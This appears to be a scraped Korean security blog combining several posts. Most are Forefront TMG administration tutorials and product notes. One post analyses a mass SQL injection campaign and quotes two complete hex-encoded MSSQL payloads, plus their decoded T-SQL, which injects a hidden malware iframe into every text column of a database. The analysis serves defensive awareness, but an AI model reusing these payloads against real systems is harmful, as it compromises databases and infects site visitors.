무료 웹방화벽 모듈인 ModSecurity가 2.7.6 버전을 출시하였습니다. 이 버전은 기존 버전에서 발견된 버그를 해결하였을 뿐만 아니라 새로운 IIS 설치 프로그램(윈도 서버용)을 채용하고, LibInjection 모듈도 업데이트되었습니다.


그러는 가운데, v2.7.7 버전도 출시되었습니다. 2.7.6은 2일전에, 2.7.7은 8시간 전에...




reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    최근 전세계적으로 SQL 인젝션 공격이 대규모로 발생하여 약 50여만 개의 웹사이트가 감염되어 충격을 주고 있습니다. 이 중에는 국내 웹사이트도 포함되어 있으며 약 2만 여개로 파악되고 있습니다. 이에 대한 사항을 정리해 봤습니다.

    자동화된 SQL 인젝션 공격은 최초에 SANS에서 파악되어 알려졌으며 자세한 사항은 아래와 같습니다.


    공격 코드로 추정되는 로그는 다음과 같습니다.

    공격 코드 #1.
    declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320
    764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e61
    6d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e6964
    20614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e7854595
    0653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d2
    05461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657
    845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722
    834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343
    73437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324
    53730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343
    34432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324
    6363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c65
    5f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c6
    55f435552736f7220%20as%20varchar(4000));exec(@s);--

    공격 코드 #2.
    declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320
    566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452
    c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420
    612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7
    220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736
    f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b27
    2b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d2929
    2b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363
    8373536393643363436393639364532453732373532463734363437333246363736463245373036383730334637333639363433443331323232
    3037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323
    6343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345204173205641726348615228
    31303629292729204645546348206e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f53652054
    61624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);--




    이 코드를 해독한 결과 다음과 같은 문자열을 찾아 낼 수 있습니다.

    공격 코드 #1.
    dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))') FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor

    공격 코드 #2.
    declarE @T VarchAr(255),@c VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd (b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set ['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe TabLE_cURsOR dEAlloCATE TaBlE_CURsoR


    주: 차이점은 declare 단어의 대소문자입니다.


    두번째 CAST() 에 포함되어 있는 문자열을 해독하면 아래와 같습니다.( 두개가 동일함)

    공격 코드 #1 & #2.
    <iframe src="hxxp://nemohuildiin.ru/tds/go.php?sid=1"  width="0" height="0" style="display:none"></iframe>

    (주: http 대신에 hxxp로 변경)


    현재 검색 엔진을 통해 감염된 웹페이지를 찾아 보면 대략 50여만 페이지가 넘습니다.


    nemohuildiin.ru 도메인은 중국에서 관리한 것으로 알려져 있으며 이미 방탄서버(bulletproof host)로 알려져 있는 AS4134 에 속해 있습니다. 이 네트워크는 Zeus 본넷의 C&C(Command and Control) 서버가 운영 중인 것으로 알려져 있습니다.

    구글의 검색 조건을 보다 자세하게 적용한 결과, AS4134가 조종하는 도메인은 약 3,008개에 이르며, 감염된 웹사이트는 약 20,800 개에 이릅니다. 구글 측에 따르면 현재 12,000 여개의 사이트가 현재에도 운영 중에 있다고 합니다.

    이렇게 웹 보안에서 가장 문제가 되는 SQL 인젝션 취약점은 최근에는 봇넷을 확장하는데 널리 이용되는 수단이 되고 있으며, 이 이외에도 바이러스 감염, 악성코드 전파 등도 함께 이뤄집니다.

    마지막으로, SQL 인젝션 취약점은 WAF(웹 방화벽, Web Application Firewall)로는 막기 어렵다는 것을 다시 한번 상기시켜 줍니다. 즉, 패턴(Pattern 또는 Signature)을 인식하여 차단하는 방식은 글자 한글자만 바꿔도 새로운 패턴으로 인식하는 한계를 지니고 있습니다.

    따라서, 이 문제점을 해결하기 위해서는 웹 소스 상에서 모든 매개변수 및 변수에 대해 안전한 값을 주고받는지 확인하는 Santization 과정을 반드시 수행하도록 소스를 개발 및 수정해야 합니다.

    감사합니다.

    참고자료: http://www.thetechherald.com/article.php/201033/6024/TTH-Labs-New-SQL-Injection-attack-hits-thousands-of-sites
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      다양한 안티바이러스 제품을 가지고 수많은 악성 프로그램의 진단율 등 테스트를 진행하는 기관 가운데에는 AV-Comparatives가 유명합니다만, 그 외에도 여러 독립적인 기관이 활동하고 있습니다.

      AV-Comparatives에서는 주로 진단율에 대해 다루지만, 오늘 소개하는 ICSA 연구소에서는 인증(Certified)라는 개념으로 발표합니다.

      ICSA 연구소는 안티바이러스 제품뿐만 아니라, 방화벽과 같은
      네트워크 장비까지도 인증 대상으로 다루고 있습니다.

      따라서, ICSA 연구소에서 인증을 필(!)한 제품이라면 국제적으로나 기술적으로 믿을 수 있는 제품이라고 할 수 있습니다.

      ICSA 연구소에서는 인증한 제품에 대한 검색 기능을 제공합니다.


      아래 화면은 WAF(Web Application Firewall, 웹방화벽) 중 ICSA 연구소에서 인증된 제품에 대한 검색 결과 입니다.


      감사합니다.


      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus

        만약 전체적인 환경 설정 값을 백업하거나 복구 하는 대신에, 방화벽 규칙이나 프로토콜 규칙, 게시 규칙 등만을 백업하거나 복구할 경우가 더 많은 것으로 생각됩니다.

        특히, 방화벽 규칙은 설정을 잘못하게 되면, 내부 클라이언트의 사용을 차단할 수도 있기 때문에 방화벽 규칙을 설정하기 전에 해당 항목을 백업해 두는 것이 좋습니다.

        전체적인 백업은 XML 파일로 이뤄지지만, 세부적인 항목별 백업은 각 노드마다 따로 제공됩니다. 아래는 방화벽 정책을 백업하는 화면입니다. Export Firewall PolicyImport Firewall Policy 항목입니다.

        아래는 URL을 그룹으로 묶은 URL 셋을 백업하거나 복구하는 화면입니다.

        지금까지 포어프론트 TMG의 관리 콘솔에서 특정 항목을 백업하거나 복구하는 방법에 대해 설명했습니다.

         

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus

          일반적으로 방화벽 장비들은 OS와 같은 프로그램들이 펌웨어 형태로 존재하고, 환경 설정 내용만 플래시나 하드 디스크와 같은 기억 장치에 저장됩니다.

          하지만, 포어프론트 TMG는 윈도우 2008 서버에서 동작하기 때문에 별도로 준비해야 할 부분이 더 많습니다.

          이 중에서 윈도우의 백업 및 복구에 대한 부분을 제외하고, 포어프론트 TMG의 환경 설정 내용을 백업하거나 복구하는 방법에 대해 소개합니다.

          포어프론트 TMG의 환경설정 내용을 백업하거나 복구하는 경우는 다음과 같습니다.  

          • 하드웨어 또는 소프트웨어 장애로 인해 새로 설치하는 경우
          • 설정 오류로 인해 기존 환경 설정 내용으로 복구해야 할 경우
          • 다른 포어프론트 TMG 서버에 환경 설정을 복제할 경우

           특히 포어프론트 TMG는 VSS(Volume Shadow Copy Service)를 이용하여 환경 설정 내용을 XML 파일로 내보내기할 수 있습니다. 만약 복구할 시점에는 VSS 프로바이더가 이 파일을 이용하게 됩니다.

          백업

          포어프론트 TMG의 환경 설정 전체를 백업하려면 포어프론트 TMG 관리 콘솔의 왼쪽 상단에 있는 서버 이름을 마우스 오른쪽 버튼으로 클릭하고, Export(Back Up) 항목을 클릭합니다. 또는, 오른쪽에 있는 Tasks 탭에서 해당 기능을 선택하는 방법도 있습니다.

           

          마이크로소프트의 전통적인 방식인 마법사가 실행됩니다.

           

          Next 버튼을 클릭하여 진행합니다.

          포어프론트 TMG에 저장되어 있는 중요한 정보를 내보내기 위해서는 비밀번호를 설정해야 합니다. 중요한 정보에는 RADIUS(인증 서버)에서 공유하는 키가 대표적입니다. 그리고, 사용자 권한을 백업할 수 있습니다.

           

          이제 XML 파일을 저장할 위치를 지정합니다. 가급적 NTFS로 포맷된 드라이브에 저장하는 것이 좋습니다.

           

          잠시 기다리면 아래와 같이 내보내기 과정을 볼 수 있습니다.

           

          저장한 파일은 XML 형태이므로 메모장과 같은 편집기를 통해 내용을 살펴볼 수 있습니다.

           

          복구

          서버의 장애로 인해 윈도우를 재설치하고 나게 되면, 기존 백업 본을 이용하여 복구할 수 있습니다. 포어프론트 TMG를 설치할 때에는 최소한의 상태로 설치하면 되고, 설치가 완료되면 복구 작업을 통해 원상태로 되돌리면 됩니다.

          포어프론트 TMG 관리 콘솔에서 Import(Restore)를 클릭하면 복구 마법사가 실행됩니다.

           

          백업된 XML 파일이 저장되어 있는 위치를 지정하는 단계입니다.

           

          복구하는 방법을 선택하는 화면이 나타납니다. Import는 기존 환경 설정 내용에 추가하는 방식이고, Overwrite는 기존 환경 설정을 모두 무시하고 새로 덮어쓰는 것입니다.

           

          Import를 선택하는 경우에는 아래와 같이 추가할 환경설정 내용을 선택할 수 있습니다.

           

          마지막으로, XML 파일을 저장할 때 사용했던 암호를 확인하는 과정을 거칩니다.

           

          그리고, 경고 창으로 기존 환경 설정 내용이 바뀐다는 것을 알려 줍니다. 확인 버튼을 눌러 진행합니다.

           

          환경 설정이 복구되는 과정을 보여주는 화면이 나타납니다.

           

          이제 환경 설정 내용이 변경되었습니다. 포어프론트 TMG의 서비스를 재시작하여 변경 사항을 반영합니다. 포어프론트 TMG 관리 콘솔의 윗부분에 아래와 같은 부분이 표시됩니다. Apply 버튼을 클릭합니다.

           

          다음 강좌에서는 특정 항목을 백업하고 복구하는 방법에 대해 다룰 예정입니다.

          감사합니다.

          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus
            포어프론트 TMG에서는 방화벽 클라이언트를 TMG 클라이언트라고 부릅니다. 이는 기존 ISA 제품군과 구별하기 위한 것으로 생각됩니다.

            하여튼, TMG 클라이언트를 자동으로 구성하는 방법은 보통 2가지로 나눌 수 있습니다.
            • DNS/DHCP를 이용하여 자동 탐색
            • AD를 이용하여 자동 탐색

            첫번째 방법은 ISA 제품군에서 사용해왔던 기술로, TMG 서버에서는 하나 더 추가되었다는 점을 손쉽게 알 수 있습니다.

            참고로, 포어프론트 TMG 제품의 가장 큰 특징은 바로 "AD를 이용하여 자동 탐색"하는 기능과 "SSL 트래픽을 검사"할 수 있다는 것입니다.

            TMG 클라이언트가 TMG 서버를 자동으로 찾는 과정은 다음과 같습니다.

            1. 액티브 디렉터리가 구현된 환경인 경우 TMG 클라이언트는 LDAP 쿼리를 통해 AD에 있는 정보를 조회합니다.

            2. TMG 클라이언트가 연결이나 어떤 이유로 인해 정보를 가져오지 못하는 경우에는 DNS/DHCP 자동 탐색 기능을 사용합니다.

            3. 액티브 디렉터리에 조회를 하였지만 정보가 없는 경우에는 DHCP에서 정보를 가져오기 위해 시도하고 그 이후에는 DNS에서 시도합니다.


            액티브 디렉터리에 TMG 서버의 정보를 입력하기 위해서는 TMG 자동 탐색 구성 도구(TmgAdConfig.exe)가 필요합니다. 이 도구는 TMG 서버의 위치를 알려주는 표시(마커, marker) 정보를 액티브 디렉터리에 저장합니다.  TMG 클라이언트는 마커 정보를 이용하여 TMG 서버를 찾아 연결합니다.

            주의: AD를 이용하는 자동 탐색 기능은 액티브 디렉터리 환경에서만 사용할 수 있습니다. 단독 실행형이나 워크그룹 형태의 네트워크에서는 사용할 수 없으며, 그 대신 DNS/DHCP를 이용해야 합니다.


            TmgAdConfig 프로그램은 아래 링크에서 AdConfigPack.exe를 다운로드할 수 있습니다.

            이제 AD 마커 키를 등록하기 위해 명령 프롬프트를 실행하여 다음과 같이 입력합니다.

            tmgadconfig add -default -type winsock -url http://ftmgfw.contoso.com:8080/wspad.dat

            Forefront TMG Auto-Discovery Configuration Tool
            New Winsock default marker successfully registered.

            위의 예에서 강조 표시한 부분은 TMG 서버의 FQDN과 사용하는 포트 번호를 나타냅니다.
             

            이제 정상적으로 설치되어 있는지 확인하기 위해 FWCTool 이라는 프로그램을 이용합니다. 이 프로그램은 TMG 클라이언트 PC의 %Programfiles%\Forefront TMG Client 폴더에 저장되어 있습니다.

            1. 명령 프롬프트를 엽니다.

            2. 해당 경로로 이동합니다.

            3. 아래와 같이 입력합니다.

            fwctool TestAutoDetect

            그러면 아래와 비슷한 결과가 화면에 나타나게 됩니다.

            FwcTool version 7.0.7733.100

            Forefront TMG Client support tool

            Copyright (c) Microsoft Corporation. All rights reserved.

             

            Action:         Test the auto detection mechanism

            Type:           Default

             

            Detection details:

             

                Timeout is set to 60 seconds

                Locating WSPAD URL on the Active Directory server

                WSPAD object was found in the global Active Directory container

                WSPAD URL found on the Active Directory server:

                http://ftmgfw.contoso.com:8080/wspad.dat

                Initializing Web server connection

                Resolving IP addresses for ftmgfw.contoso.com

                Resolved 1 address(es):

                10.10.10.69

                Connecting to address #1: 10.10.10.69:8080

                Waiting for address #1 to connect

                Address #1 successfully connected

                Requesting wspad.dat file

                Web server is connected and ready to send WSPAD file

                Downloading WSPAD file

                WSPAD file was downloaded successfully

                Detected Forefront TMG: FTMGFW:1745

             

            Result:         The command completed successfully.


            노란색으로 표시된 부분이 앞서 TmgAdConfig 프로그램에서 등록한 내용과 일치하는지 확인합니다.

            감사합니다.

            참고문서: http://blogs.technet.com/isablog/archive/2009/10/23/tmg-client-introduces-automatic-detection-using-active-directory.aspx
            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus
              기업은 나름대로의 목적과 필요에 의해서 고유한 네트워크 환경을 가지게 됩니다. 이러한 환경에 포어프론트 TMG 서버를 구현하기 위해서는 어느정도 일관된 구현 방식을 이해할 필요가 있습니다.

              포어프론트 TMG는 기존 ISA 제품과 마찬가지로 모두 4가지 형태로 구현할 수 있습니다. 이에 대해 간략히 정리해 봅니다. 방화벽의 형태로는 모두 3가지로 표현할 수 있으며 웹프록시/캐시 용도가 나머지 하나입니다.


              • Edge Firewall(경계면 방화벽) - 하드웨어 방화벽과 마찬가지로 외부(인터넷)에서 내부 네트워크로 들어오는 트래픽을 전면에서 방어하는 형태입니다. 보통 내부는 사설망(Private Network)이 위치합니다. 아래 그림에서 VPN 클라이언트 네트워크는 PPTP나 IPSec을 통해 외부에 위치한 사용자가 TMG 서버를 통해 내부 네트워크로 들어올 수 있다는 것을 나타냅니다.

              • 3-Leg Perimeter(3발 경계) - Tri-homed Perimeter라고도 합니다. Edge Firewall 구조에 DMZ 네트워크가 추가되는 형태입니다. DMZ에서는 웹서버와 같이 외부에 노출해야 하는 서버들이 위치하게 됩니다.

              • Back Firewall(후방 방화벽) - 일반적으로 기업 네트워크 환경에서는 이미 하드웨어 기반의 방화벽을 사용하는 경우가 많습니다. 이러한 경우에 포어프론트 TMG 서버를 각 지사와 같이 내부 네트워크를 개별적으로 분리하여 관리할 때에 사용할 수 있습니다. TMG 서버를 Back Firewall로 사용할 때에는 외부에서 접근할 수 있도록 하는 정책을 수립할 때에는 TMG 서버가 사용하는 포트를 열어야 하는 작업이 필요합니다.

              • Single Network Adapter(단일 네트워크 어댑터) - 방화벽으로 동작하기 위해서는 적어도 2개 이상의 랜카드(네트워크 어댑터)가 필요합니다. 하지만, 웹 프록시/가속(캐시) 모드로만 사용할 경우에는 하나의 랜카드로도 충분히 동작합니다. 다만, 일부 기능을 사용할 수 없기 때문에 "웹 프록시/가속" 용도로 사용한다고 이해하면 편리합니다.


              지금까지 포어프론트 TMG로 구현할 수 있는 네트워크 토폴로지에 대해서 설명했습니다. 참고로, Back Firewall 방식에서 포어프론트 TMG 서버는 앞단에 위치(Edge Firewall)할 수도 있고, 뒷단에 위치(Back Firewall)할 수도 있으며, 양 쪽 모두 사용할 수도 있으며 이를 Back-to-Back Firewall(또는 네트워크) 이라고 합니다. 

              감사합니다.

              출처: http://technet.microsoft.com/en-us/library/ee869545.aspx

              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus
                포어프론트 TMG의 라이선스 정책이 새롭게 출시되어 간략히 정리해봤습니다.

                포어프론트 TMG는 두가지의 라이선스 형태로 제공됩니다.
                • 서버 라이선스: URL 필터링, 악성 프로그램 진단, 침입 탐지, 애플리케이션/네트워크 방화벽 등의 기능을 제공하는 TMG 서버
                • 구독 라이선스: 최근의 웹 위협으로부터 보호하기 위해 클라우드 기반의 URL 필터링 및 악성 프로그램을 필터링하는 업데이트 라이선스


                포어프론트 TMG의 서버 라이선스는 CPU의 개수에 따라 결정됩니다. 또한, 가상화 사용시에도 동일하게 결정됩니다.

                • 스탠다드 에디션: CPU당 1,499 달러. 최대 CPU 4개까지 지원.
                • 엔터프라이즈 에디션: CPU 당 5,999 달러. CPU 제한 없음.


                또한, 25 CPU를 위한 특별 가격으로도 제공됩니다.

                • 엔터프라이즈 에디션 25 프로세서 팩: 75,000 달러.

                포어프론트 TMG의 구독 라이선스는 사용자 수 또는 장비 수를 기반으로 결정됩니다. 사용자 수에 따른 가격은 아래와 같습니다.
                • 웹 보호 서비스: 사용자당 12달러(1년)

                출처: http://www.microsoft.com/forefront/threat-management-gateway/en/us/pricing-licensing.aspx

                알림: MS 상의 라이선스 정책은 아주 복잡하므로, 기업이나 조직의 상황에 맞도록 꼼꼼하게 파악하시는 것이 좋습니다.

                감사합니다.




                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus
                  서버 한대로 구성하게 되면 당연히 장비, 운영체제 등의 문제로 인해 서비스에 문제가 될 가능성이 높습니다.

                  이러한 경우에는 로드밸런싱 이라는 기술을 사용하여 동일한 기능을 제공하는 여러 대의 서버를 둠으로써 해결하는 경우가 많으며 보통 앞 단에는 L4 라는 스위치 장비가 오게 됩니다.

                  하지만, TMG는 Windows 2008 운영체제 위에서 동작하는 일종의 프로그램이기 때문에 동일한 잣대로 볼 수가 없는 것이 사실입니다.

                  TMG는 이러한 문제점을 해결하기 위해 여러 대의 TMG를 논리적으로 묶는 어레이(배열, Array) 형태의 시나리오를 제공합니다.

                  먼저 배열 형태를 사용하기 위해서는 TMG 엔터프라이즈 제품을 사용해야 합니다. 스탠다드 제품에서는 지원하지 않습니다. 관련 자료: http://moonslab.com/818 단, 스탠다드 제품은 배열의 구성원으로 사용할 수 있습니다.

                  어레이로 묶음으로써 여러 대의 TMG 서버를 중앙 집중적으로 일관하여 관리할 수 있는 장점을 제공합니다. 어레이에서는 다음과 같은 정보를 공유합니다.
                  • 어레이 설정 정보 - 어레이에 포함되어 있는 구성원에게 모두 공유되는 정보
                  • 서버 구성 정보 -  어레이에 포함되어 있는 각 구성원 서버에 대한 정보

                  포어프론트 TMG 엔터프라이즈 제품에서는 다음과 같이 두가지 형태의 어레이를 지원합니다.

                  • 단독실행형: 최대 50대의 TMG 서버를 하나로 묶을 수 있으며, 주로 로드 밸런싱 목적으로 사용됩니다. 
                  • EMS 관리: 최대 200 개의 어레이까지 관리할 수 있으며, 각 어레이는 최대 50대의 TMG 서버를 둘 수 있습니다. 보통 회사가 지리적 또는 네트워크가 분리되어 있으면서도 이를 단일화해서 관리하고 할 때 사용합니다.


                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus
                    포어프론트 TMG 2010 제품 군은 다음과 같이 두가지로 나눠서 제공됩니다.


                    reTweet
                    Posted by 문스랩닷컴
                    blog comments powered by Disqus


                      Web Analytics Blogs Directory